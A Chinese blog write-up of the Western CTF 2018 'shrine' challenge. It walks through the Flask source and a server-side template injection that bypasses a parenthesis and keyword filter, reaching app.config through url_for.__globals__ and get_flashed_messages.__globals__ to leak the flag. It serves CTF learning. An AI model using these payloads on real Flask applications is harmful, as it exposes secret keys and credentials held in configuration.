[Western CTF 2018]shrine

最新推荐文章于 2023-07-24 10:00:05 发布
最新推荐文章于 2023-07-24 10:00:05 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: ctf 文章标签: flask python 后端 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122953637
版权

1NDEX

0x00 前言

ssti复习
贴一下源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s  #'{% set config=None%}{% set self=None%}'+s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

目的很明确,读取config中FLAG的值
config 实质上是一个字典的子类,可以像字典一样操作

如果不存在waf
直观地看一下config打印出什么

GET /shrine/{{config}}

<Config {‘JSON_AS_ASCII’: True, ‘USE_X_SENDFILE’: False, ‘SESSION_COOKIE_SECURE’: False, ‘SESSION_COOKIE_PATH’: None, ‘SESSION_COOKIE_DOMAIN’: None, ‘SESSION_COOKIE_NAME’: ‘session’, ‘MAX_COOKIE_SIZE’: 4093, ‘SESSION_COOKIE_SAMESITE’: None, ‘PROPAGATE_EXCEPTIONS’: None, ‘ENV’: ‘production’, ‘DEBUG’: True, ‘SECRET_KEY’: None, ‘EXPLAIN_TEMPLATE_LOADING’: False, ‘MAX_CONTENT_LENGTH’: None, ‘APPLICATION_ROOT’: ‘/’, ‘SERVER_NAME’: None, ‘FLAG’: ‘TWCTF{secret}’, ‘PREFERRED_URL_SCHEME’: ‘http’, ‘JSONIFY_PRETTYPRINT_REGULAR’: False, ‘TESTING’: False, ‘PERMANENT_SESSION_LIFETIME’: datetime.timedelta(31), ‘TEMPLATES_AUTO_RELOAD’: None, ‘TRAP_BAD_REQUEST_ERRORS’: None, ‘JSON_SORT_KEYS’: True, ‘JSONIFY_MIMETYPE’: ‘application/json’, ‘SESSION_COOKIE_HTTPONLY’: True, ‘SEND_FILE_MAX_AGE_DEFAULT’: datetime.timedelta(0, 43200), ‘PRESERVE_CONTEXT_ON_EXCEPTION’: None, ‘SESSION_REFRESH_EACH_REQUEST’: True, ‘TRAP_HTTP_EXCEPTIONS’: False}>

同理 使用self
可以看到其中包含了config

{{self.__dict__}}

{’_TemplateReference__context’: <Context {‘url_for’: <function url_for at 0x7f67e7d0cb90>, ‘g’: <flask.g of ‘main’>, ‘request’: <Request ‘http://my_server/shrine/{{self.dict}}’ [GET]>, ‘namespace’: <class ‘jinja2.utils.Namespace’>, ‘lipsum’: <function generate_lorem_ipsum at 0x7f67e8dc2c08>, ‘aaaa’: None, ‘range’: <type ‘xrange’>, ‘session’: <NullSession {}>, ‘dict’: <type ‘dict’>, ‘get_flashed_messages’: <function get_flashed_messages at 0x7f67e7d0ccf8>, ‘cycler’: <class ‘jinja2.utils.Cycler’>, ‘joiner’: <class ‘jinja2.utils.Joiner’>, ‘config’: <Config {‘JSON_AS_ASCII’: True, ‘USE_X_SENDFILE’: False, ‘SESSION_COOKIE_SECURE’: False, ‘SESSION_COOKIE_PATH’: None, ‘SESSION_COOKIE_DOMAIN’: None, ‘SESSION_COOKIE_NAME’: ‘session’, ‘MAX_COOKIE_SIZE’: 4093, ‘SESSION_COOKIE_SAMESITE’: None, ‘PROPAGATE_EXCEPTIONS’: None, ‘ENV’: ‘production’, ‘DEBUG’: True, ‘SECRET_KEY’: None, ‘EXPLAIN_TEMPLATE_LOADING’: False, ‘MAX_CONTENT_LENGTH’: None, ‘APPLICATION_ROOT’: ‘/’, ‘SERVER_NAME’: None, ‘FLAG’: ‘TWCTF{secret}’, ‘PREFERRED_URL_SCHEME’: ‘http’, ‘JSONIFY_PRETTYPRINT_REGULAR’: False, ‘TESTING’: False, ‘PERMANENT_SESSION_LIFETIME’: datetime.timedelta(31), ‘TEMPLATES_AUTO_RELOAD’: None, ‘TRAP_BAD_REQUEST_ERRORS’: None, ‘JSON_SORT_KEYS’: True, ‘JSONIFY_MIMETYPE’: ‘application/json’, ‘SESSION_COOKIE_HTTPONLY’: True, ‘SEND_FILE_MAX_AGE_DEFAULT’: datetime.timedelta(0, 43200), ‘PRESERVE_CONTEXT_ON_EXCEPTION’: None, ‘SESSION_REFRESH_EACH_REQUEST’: True, ‘TRAP_HTTP_EXCEPTIONS’: False}>} of None>}

由于 ( 与 )都被过滤,所以我所知晓的命令执行payload皆不能用

0x01 brain.md

app.config['FLAG'] = os.environ.pop('FLAG')

os.environ可以获取系统中的有关信息
此处是把环境变量flag填入了config中
直观打印一下看看


>>> import os
>>> os.environ
{'LESS_TERMCAP_md': '\x1b[1;36m', 'XDG_GREETER_DATA_DIR': '/var/lib/lightdm/data/kidult', '_JAVA_OPTIONS': '-Dawt.useSystemAAFontSettings=on -Dswing.aatext=true', 'XDG_RUNTIME_DIR': '/run/user/1000', 'XDG_CURRENT_DESKTOP': 'XFCE', 'XDG_SEAT_PATH': '/org/freedesktop/DisplayManager/Seat0', 'LOGNAME': 'kidult', 'USER': 'kidult', 'HOME': '/home/kidult', 'XDG_VTNR': '7', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games', 'DISPLAY': ':0.0', 'SSH_AGENT_PID': '822', 'LANG': 'zh_CN.UTF-8', 'TERM': 'xterm-256color', 'SHELL': '/usr/bin/zsh', 'COLORFGBG': '15;0', 'XAUTHORITY': '/home/kidult/.Xauthority', 'LANGUAGE': 'zh_CN:zh', 'SESSION_MANAGER': 'local/kali:@/tmp/.ICE-unix/773,unix/kali:/tmp/.ICE-unix/773', 'POWERSHELL_TELEMETRY_OPTOUT': '1', 'LESS_TERMCAP_me': '\x1b[0m', 'QT_QPA_PLATFORMTHEME': 'qt5ct', 'LESS_TERMCAP_mb': '\x1b[1;31m', 'QT_ACCESSIBILITY': '1', 'WINDOWID': '0', 'QT_AUTO_SCREEN_SCALE_FACTOR': '0', 'XDG_SESSION_DESKTOP': 'lightdm-xsession', 'SHLVL': '1', 'COMMAND_NOT_FOUND_INSTALL_PROMPT': '1', 'SSH_AUTH_SOCK': '/tmp/ssh-6DRcnK8HUmsi/agent.773', 'LESS_TERMCAP_ue': '\x1b[0m', 'GDMSESSION': 'lightdm-xsession', 'PANEL_GDK_CORE_DEVICE_EVENTS': '0', 'XDG_SESSION_PATH': '/org/freedesktop/DisplayManager/Session0', 'XDG_SESSION_ID': '2', 'DBUS_SESSION_BUS_ADDRESS': 'unix:path=/run/user/1000/bus', '_': '/usr/bin/python', 'DESKTOP_SESSION': 'lightdm-xsession', 'XDG_CONFIG_DIRS': '/etc/xdg', 'GTK_MODULES': 'gail:atk-bridge', 'XDG_SESSION_TYPE': 'x11', 'OLDPWD': '/home/kidult', 'GDM_LANG': 'zh_CN.utf8', 'LESS_TERMCAP_se': '\x1b[0m', 'XDG_DATA_DIRS': '/usr/share/xfce4:/usr/local/share/:/usr/share/:/usr/share', 'PWD': '/home/kidult', 'LESS_TERMCAP_us': '\x1b[1;32m', 'XDG_SESSION_CLASS': 'user', 'COLORTERM': 'truecolor', 'XDG_MENU_PREFIX': 'xfce-', 'LESS_TERMCAP_so': '\x1b[01;33m', 'LS_COLORS': 'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:', 'XDG_SEAT': 'seat0'}

return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

等价 ‘{% set config=None%}{% set self=None%}’+s
即当前局部 config变量与self变量均赋值为None

那么既然命令执行也走不通,便想着通过上层全局变量访问到config

知识扩充

current_app
类型是LocalProxy
像全局变量一样工作,但只能在处理请求期间且在处理它的线程中访问
返回的栈顶元素不是应用上下文,而是flask的应用实例对象(当前项目的app

那么先访问到current_app再访问其config即可
在大牛文章中可知,flask内部维护着两个线程隔离的栈
current_app只有在处理请求时才有指向
刚好适用我们ssti的情况

参考

https://blog.csdn.net/JENREY/article/details/86606653
https://blog.csdn.net/m0_37323771/article/details/80645100

url_for

如果 Flask 能匹配 URL,那么 Flask 可以生成它们吗?当然可以。你可以用 url_for() 来给指定的函数构造 URL。它接受函数名作为第一个参数,也接受对应 URL 规则的变量部分的命名参数。未知变量部分会添加到 URL 末尾作为查询参数。这里有一些例子:

>>> from flask import Flask, url_for
>>> app = Flask(__name__)
>>> @app.route('/')
... def index(): pass
...
>>> @app.route('/login')
... def login(): pass
...
>>> @app.route('/user/<username>')
... def profile(username): pass
...
>>> with app.test_request_context():
...  print url_for('index')
...  print url_for('login')
...  print url_for('login', next='/')
...  print url_for('profile', username='John Doe')
...
/
/login
/login?next=/
/user/John%20Doe

通过

>>> from flask import url_for
>>> url_for.__globals__

我们可以找到

'current_app': <LocalProxy unbound>
get_flashed_messages()

get_flashed_messages(w3c)
与url_for同理
通过get_flashed_messages.__globals__也能找到current_app

exp

/shrine/{{url_for.__globals__['current_app'].config}}
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

0x02 rethink

非科班的苦恼…

k_du1t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WesternCTF2018]shrine
brainw的博客
04-28 471
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/...
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 255
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 256
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
google-ctf2018
05-10
谷歌ctf2018初学者探索让我说实话。 真正的挑战不在我的联盟范围内,所以我对初学者的追求很有趣。 这是我的最终地图:解决挑战
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
Google-CTF-2018
05-10
Google-CTF-2018 Google CTF 2018- Login: https://capturetheflag.withgoogle.com/? Join with this key : -LFIfTjuZILx9Osq2Mg2 ----密码---- better ZIP : CTF{SomethingSomthing1337} DM Collision : CTF{7...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 3841
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序中,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask 中,url_for 函数是定义在 Flask 的全局命名空间中的
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2450
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
WesternCTF2018_shrine
抒情诗
05-08 450
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923 0x00 开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码: import flask import os app = flask.Fla...
XCTF-攻防世界CTF平台-Web类——16、shrineFlask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘])
Onlyone_1314的博客
12-11 1596
目录标题python模板注入代码分析:构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址: 这是Pythonflask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内
Linux下小小输入法的安装
羊村の村长
11-04 993
下载:http://115.com/folder/f69cec2c653 主页:http://yong.uueasy.com 如果是redhat系列的,则建议下载rpm包 安装使用命令rpm -ivh yong-1.0.0-1.rpm如果是其他的版本,下载7z包先把7z包解压到你要的安装目录(7z解压工具在Linux下是p7zip)然后根据你所使用的发行版配置环境变量,主要有XMO...
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 8751
1 注入原理 Flaskpython语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
CTF SSTI 一些记录
3569
10-13 5826
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
[SWPUCTF 2018]SimplePHP
最新发布
07-28
根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值